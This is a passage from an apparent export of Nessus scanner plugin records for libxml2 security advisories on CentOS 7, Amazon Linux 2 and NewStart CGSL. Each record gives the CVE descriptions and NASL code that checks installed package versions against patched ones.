exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libxml2 / libxml2-devel / libxml2-python / libxml2-static');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:58:20", "description": "The remote CentOS Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the CESA-2020:1190 advisory.\n\n - libxml2: DoS caused by incorrect error detection during XZ decompression (CVE-2015-8035)\n\n - libxml2: Use after free triggered by XPointer paths beginning with range-to (CVE-2016-5131)\n\n - libxml2: Use after free in xmlXPathCompOpEvalPositionalPredicate() function in xpath.c (CVE-2017-15412)\n\n - libxml2: Unrestricted memory usage in xz_head() function in xzlib.c (CVE-2017-18258)\n\n - libxml2: NULL pointer dereference in xmlXPathCompOpEval() function in xpath.c (CVE-2018-14404)\n\n - libxml2: Infinite loop caused by incorrect error detection during LZMA decompression (CVE-2018-14567)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-04-10T00:00:00", "type": "nessus", "title": "CentOS 7 : libxml2 (CESA-2020:1190)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8035", "CVE-2016-5131", "CVE-2017-15412", "CVE-2017-18258", "CVE-2018-14404", "CVE-2018-14567"], "modified": "2021-03-16T00:00:00", "cpe": ["p-cpe:/a:centos:centos:libxml2", "p-cpe:/a:centos:centos:libxml2-devel", "p-cpe:/a:centos:centos:libxml2-python", "p-cpe:/a:centos:centos:libxml2-static", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2020-1190.NASL", "href": "https://www.tenable.com/plugins/nessus/135358", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:1190 and\n# CentOS Errata and Security Advisory 2020:1190 respectively.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135358);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/16\");\n\n script_cve_id(\n \"CVE-2015-8035\",\n \"CVE-2016-5131\",\n \"CVE-2017-15412\",\n \"CVE-2017-18258\",\n \"CVE-2018-14404\",\n \"CVE-2018-14567\"\n );\n script_xref(name:\"RHSA\", value:\"2020:1190\");\n\n script_name(english:\"CentOS 7 : libxml2 (CESA-2020:1190)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote CentOS Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nCESA-2020:1190 advisory.\n\n - libxml2: DoS caused by incorrect error detection during XZ decompression (CVE-2015-8035)\n\n - libxml2: Use after free triggered by XPointer paths beginning with range-to (CVE-2016-5131)\n\n - libxml2: Use after free in xmlXPathCompOpEvalPositionalPredicate() function in xpath.c (CVE-2017-15412)\n\n - libxml2: Unrestricted memory usage in xz_head() function in xzlib.c (CVE-2017-18258)\n\n - libxml2: NULL pointer dereference in xmlXPathCompOpEval() function in xpath.c (CVE-2018-14404)\n\n - libxml2: Infinite loop caused by incorrect error detection during LZMA decompression (CVE-2018-14567)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://lists.centos.org/pipermail/centos-cr-announce/2020-April/012518.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2ed8ea19\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/252.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/400.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/476.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-5131\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_cwe_id(252, 400, 476);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libxml2-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libxml2-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/CentOS/release');\nif (isnull(release) || 'CentOS' >!< release) audit(AUDIT_OS_NOT, 'CentOS');\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'CentOS');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '7')) audit(AUDIT_OS_NOT, 'CentOS 7.x', 'CentOS ' + os_ver);\n\nif (!get_kb_item('Host/CentOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'CentOS', cpu);\n\npkgs = [\n {'reference':'libxml2-2.9.1-6.el7.4', 'cpu':'i686', 'release':'CentOS-7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libxml2-2.9.1-6.el7.4', 'cpu':'x86_64', 'release':'CentOS-7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libxml2-devel-2.9.1-6.el7.4', 'cpu':'i686', 'release':'CentOS-7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libxml2-devel-2.9.1-6.el7.4', 'cpu':'x86_64', 'release':'CentOS-7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libxml2-python-2.9.1-6.el7.4', 'cpu':'x86_64', 'release':'CentOS-7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libxml2-static-2.9.1-6.el7.4', 'cpu':'i686', 'release':'CentOS-7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libxml2-static-2.9.1-6.el7.4', 'cpu':'x86_64', 'release':'CentOS-7', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n cr_plugin_caveat = '\\n' +\n 'NOTE: The security advisory associated with this vulnerability has a\\n' +\n 'fixed package version that may only be available in the continuous\\n' +\n 'release (CR) repository for CentOS, until it is present in the next\\n' +\n 'point release of CentOS.\\n\\n' +\n 'If an equal or higher package level does not exist in the baseline\\n' +\n 'repository for your major version of CentOS, then updates from the CR\\n' +\n 'repository will need to be applied in order to address the\\n' +\n 'vulnerability.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + cr_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libxml2 / libxml2-devel / libxml2-python / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:05:44", "description": "A NULL pointer dereference vulnerability exists in the xpath.c:xmlXPathCompOpEval() function of libxml2 through 2.9.8 when parsing an invalid XPath expression in the XPATH_OP_AND or XPATH_OP_OR case. Applications processing untrusted XSL format inputs with the use of the libxml2 library may be vulnerable to a denial of service attack due to a crash of the application. (CVE-2018-14404)\n\nUse after free in libxml2 before 2.9.5, as used in Google Chrome prior to 63.0.3239.84 and other products, allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n(CVE-2017-15412)\n\nA denial of service flaw was found in libxml2. A remote attacker could provide a specially crafted XML or HTML file that, when processed by an application using libxml2, would cause that application to crash.\n(CVE-2015-8035)\n\nlibxml2 2.9.8, if --with-lzma is used, allows remote attackers to cause a denial of service (infinite loop) via a crafted XML file that triggers LZMA_MEMLIMIT_ERROR, as demonstrated by xmllint, a different vulnerability than CVE-2015-8035 and CVE-2018-9251 . (CVE-2018-14567)\n\nThe xz_head function in xzlib.c in libxml2 before 2.9.6 allows remote attackers to cause a denial of service (memory consumption) via a crafted LZMA file, because the decoder functionality does not restrict memory usage to what is required for a legitimate file.\n(CVE-2017-18258)\n\nUse-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function. (CVE-2016-5131)", "cvss3": {}, "published": "2020-07-23T00:00:00", "type": "nessus", "title": "Amazon Linux 2 : libxml2 (ALAS-2020-1466)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8035", "CVE-2016-5131", "CVE-2017-15412", "CVE-2017-18258", "CVE-2018-14404", "CVE-2018-14567", "CVE-2018-9251"], "modified": "2020-07-27T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:libxml2", "p-cpe:/a:amazon:linux:libxml2-debuginfo", "p-cpe:/a:amazon:linux:libxml2-devel", "p-cpe:/a:amazon:linux:libxml2-python", "p-cpe:/a:amazon:linux:libxml2-static", "cpe:/o:amazon:linux:2"], "id": "AL2_ALAS-2020-1466.NASL", "href": "https://www.tenable.com/plugins/nessus/138855", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2020-1466.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(138855);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/07/27\");\n\n script_cve_id(\"CVE-2015-8035\", \"CVE-2016-5131\", \"CVE-2017-15412\", \"CVE-2017-18258\", \"CVE-2018-14404\", \"CVE-2018-14567\");\n script_xref(name:\"ALAS\", value:\"2020-1466\");\n\n script_name(english:\"Amazon Linux 2 : libxml2 (ALAS-2020-1466)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Amazon Linux 2 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A NULL pointer dereference vulnerability exists in the\nxpath.c:xmlXPathCompOpEval() function of libxml2 through 2.9.8 when\nparsing an invalid XPath expression in the XPATH_OP_AND or XPATH_OP_OR\ncase. Applications processing untrusted XSL format inputs with the use\nof the libxml2 library may be vulnerable to a denial of service attack\ndue to a crash of the application. (CVE-2018-14404)\n\nUse after free in libxml2 before 2.9.5, as used in Google Chrome prior\nto 63.0.3239.84 and other products, allowed a remote attacker to\npotentially exploit heap corruption via a crafted HTML page.\n(CVE-2017-15412)\n\nA denial of service flaw was found in libxml2. A remote attacker could\nprovide a specially crafted XML or HTML file that, when processed by\nan application using libxml2, would cause that application to crash.\n(CVE-2015-8035)\n\nlibxml2 2.9.8, if --with-lzma is used, allows remote attackers to\ncause a denial of service (infinite loop) via a crafted XML file that\ntriggers LZMA_MEMLIMIT_ERROR, as demonstrated by xmllint, a different\nvulnerability than CVE-2015-8035 and CVE-2018-9251 . (CVE-2018-14567)\n\nThe xz_head function in xzlib.c in libxml2 before 2.9.6 allows remote\nattackers to cause a denial of service (memory consumption) via a\ncrafted LZMA file, because the decoder functionality does not restrict\nmemory usage to what is required for a legitimate file.\n(CVE-2017-18258)\n\nUse-after-free vulnerability in libxml2 through 2.9.4, as used in\nGoogle Chrome before 52.0.2743.82, allows remote attackers to cause a\ndenial of service or possibly have unspecified other impact via\nvectors related to the XPointer range-to function. (CVE-2016-5131)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/AL2/ALAS-2020-1466.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Run 'yum update libxml2' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"AL2\", reference:\"libxml2-2.9.1-6.amzn2.4.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"libxml2-debuginfo-2.9.1-6.amzn2.4.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"libxml2-devel-2.9.1-6.amzn2.4.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"libxml2-python-2.9.1-6.amzn2.4.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"libxml2-static-2.9.1-6.amzn2.4.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2 / libxml2-debuginfo / libxml2-devel / libxml2-python / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:26:32", "description": "The remote NewStart CGSL host, running version CORE 5.05 / MAIN 5.05, has libxml2 packages installed that are affected by multiple vulnerabilities:\n\n - Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function. (CVE-2016-5131)\n\n - Use after free in libxml2 before 2.9.5, as used in Google Chrome prior to 63.0.3239.84 and other products, allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2017-15412)\n\n - A NULL pointer dereference vulnerability exists in the xpath.c:xmlXPathCompOpEval() function of libxml2 through 2.9.8 when parsing an invalid XPath expression in the XPATH_OP_AND or XPATH_OP_OR case.\n Applications processing untrusted XSL format inputs with the use of the libxml2 library may be vulnerable to a denial of service attack due to a crash of the application. (CVE-2018-14404)\n\n - libxml2 2.9.8, if --with-lzma is used, allows remote attackers to cause a denial of service (infinite loop) via a crafted XML file that triggers LZMA_MEMLIMIT_ERROR, as demonstrated by xmllint, a different vulnerability than CVE-2015-8035 and CVE-2018-9251. (CVE-2018-14567)\n\n - The xz_head function in xzlib.c in libxml2 before 2.9.6 allows remote attackers to cause a denial of service (memory consumption) via a crafted LZMA file, because the decoder functionality does not restrict memory usage to what is required for a legitimate file. (CVE-2017-18258)\n\n - The xz_decomp function in xzlib.c in libxml2 2.9.1 does not properly detect compression errors, which allows context-dependent attackers to cause a denial of service (process hang) via crafted XML data.\n (CVE-2015-8035)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "NewStart CGSL CORE 5.05 / MAIN 5.05 : libxml2 Multiple Vulnerabilities (NS-SA-2020-0091)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8035", "CVE-2016-5131", "CVE-2017-15412", "CVE-2017-18258", "CVE-2018-14404", "CVE-2018-14567", "CVE-2018-9251"], "modified": "2020-12-10T00:00:00", "cpe": [], "id": "NEWSTART_CGSL_NS-SA-2020-0091_LIBXML2.NASL", "href": "https://www.tenable.com/plugins/nessus/143920", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2020-0091. The text\n# itself is copyright (C) ZTE, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143920);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/10\");\n\n script_cve_id(\n \"CVE-2015-8035\",\n \"CVE-2016-5131\",\n \"CVE-2017-15412\",\n \"CVE-2017-18258\",\n \"CVE-2018-14404\",\n \"CVE-2018-14567\"\n );\n script_bugtraq_id(\n 77390,\n 92053,\n 102098,\n 105198\n );\n\n script_name(english:\"NewStart CGSL CORE 5.05 / MAIN 5.05 : libxml2 Multiple Vulnerabilities (NS-SA-2020-0091)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote machine is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version CORE 5.05 / MAIN 5.05, has libxml2 packages installed that are affected\nby multiple vulnerabilities:\n\n - Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82,\n allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors\n related to the XPointer range-to function. (CVE-2016-5131)\n\n - Use after free in libxml2 before 2.9.5, as used in Google Chrome prior to 63.0.3239.84 and other products,\n allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2017-15412)\n\n - A NULL pointer dereference vulnerability exists in the xpath.c:xmlXPathCompOpEval() function of libxml2\n through 2.9.8 when parsing an invalid XPath expression in the XPATH_OP_AND or XPATH_OP_OR case.\n Applications processing untrusted XSL format inputs with the use of the libxml2 library may be vulnerable\n to a denial of service attack due to a crash of the application. (CVE-2018-14404)\n\n - libxml2 2.9.8, if --with-lzma is used, allows remote attackers to cause a denial of service (infinite\n loop) via a crafted XML file that triggers LZMA_MEMLIMIT_ERROR, as demonstrated by xmllint, a different\n vulnerability than CVE-2015-8035 and CVE-2018-9251. (CVE-2018-14567)\n\n - The xz_head function in xzlib.c in libxml2 before 2.9.6 allows remote attackers to cause a denial of\n service (memory consumption) via a crafted LZMA file, because the decoder functionality does not restrict\n memory usage to what is required for a legitimate file. (CVE-2017-18258)\n\n - The xz_decomp function in xzlib.c in libxml2 2.9.1 does not properly detect compression errors, which\n allows context-dependent attackers to cause a denial of service (process hang) via crafted XML data.\n (CVE-2015-8035)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2020-0091\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL libxml2 packages. Note that updated packages may not be available yet. Please contact ZTE\nfor more information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-15412\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/ZTE-CGSL/release');\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, 'NewStart Carrier Grade Server Linux');\n\nif (release !~ \"CGSL CORE 5.05\" &&\n release !~ \"CGSL MAIN 5.05\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL CORE 5.05 / NewStart CGSL MAIN 5.05');\n\nif (!get_kb_item('Host/ZTE-CGSL/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'NewStart Carrier Grade Server Linux', cpu);\n\nflag = 0;\n\npkgs = {\n 'CGSL CORE 5.05': [\n 'libxml2-2.9.1-6.el7.4',\n 'libxml2-debuginfo-2.9.1-6.el7.4',\n 'libxml2-devel-2.9.1-6.el7.4',\n 'libxml2-python-2.9.1-6.el7.4',\n 'libxml2-static-2.9.1-6.el7.4'\n ],\n 'CGSL MAIN 5.05': [\n 'libxml2-2.9.1-6.el7.4',\n 'libxml2-debuginfo-2.9.1-6.el7.4',\n 'libxml2-devel-2.9.1-6.el7.4',\n 'libxml2-python-2.9.1-6.el7.4',\n 'libxml2-static-2.9.1-6.el7.4'\n ]\n};\npkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:'ZTE ' + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libxml2');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:13:42", "description": "The remote NewStart CGSL host, running version CORE 5.04 / MAIN 5.04, has libxml2 packages installed that are affected by multiple vulnerabilities:\n\n - Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function. (CVE-2016-5131)\n\n - Use after free in libxml2 before 2.9.5, as used in Google Chrome prior to 63.0.3239.84 and other products, allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2017-15412)\n\n - A NULL pointer dereference vulnerability exists in the xpath.c:xmlXPathCompOpEval() function of libxml2 through 2.9.8 when parsing an invalid XPath expression in the XPATH_OP_AND or XPATH_OP_OR case.\n Applications processing untrusted XSL format inputs with the use of the libxml2 library may be vulnerable to a denial of service attack due to a crash of the application. (CVE-2018-14404)\n\n - libxml2 2.9.8, if --with-lzma is used, allows remote attackers to cause a denial of service (infinite loop) via a crafted XML file that triggers LZMA_MEMLIMIT_ERROR, as demonstrated by xmllint, a different vulnerability than CVE-2015-8035 and CVE-2018-9251. (CVE-2018-14567)\n\n - The xz_head function in xzlib.c in libxml2 before 2.9.6 allows remote attackers to cause a denial of service (memory consumption) via a crafted LZMA file, because the decoder functionality does not restrict memory usage to what is required for a legitimate file. (CVE-2017-18258)\n\n - The xz_decomp function in xzlib.c in libxml2 2.9.1 does not properly detect compression errors, which allows context-dependent attackers to cause a denial of service (process hang) via crafted XML data.\n (CVE-2015-8035)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "NewStart CGSL CORE 5.04 / MAIN 5.04 : libxml2 Multiple Vulnerabilities (NS-SA-2020-0060)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8035", "CVE-2016-5131", "CVE-2017-15412", "CVE-2017-18258", "CVE-2018-14404", "CVE-2018-14567", "CVE-2018-9251"], "modified": "2020-12-10T00:00:00", "cpe": [], "id": "NEWSTART_CGSL_NS-SA-2020-0060_LIBXML2.NASL", "href": "https://www.tenable.com/plugins/nessus/143906", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2020-0060. The text\n# itself is copyright (C) ZTE, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143906);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/10\");\n\n script_cve_id(\n \"CVE-2015-8035\",\n \"CVE-2016-5131\",\n \"CVE-2017-15412\",\n \"CVE-2017-18258\",\n \"CVE-2018-14404\",\n \"CVE-2018-14567\"\n );\n script_bugtraq_id(\n 77390,\n 92053,\n 102098,\n 105198\n );\n\n script_name(english:\"NewStart CGSL CORE 5.04 / MAIN 5.04 : libxml2 Multiple Vulnerabilities (NS-SA-2020-0060)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote machine is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version CORE 5.04 / 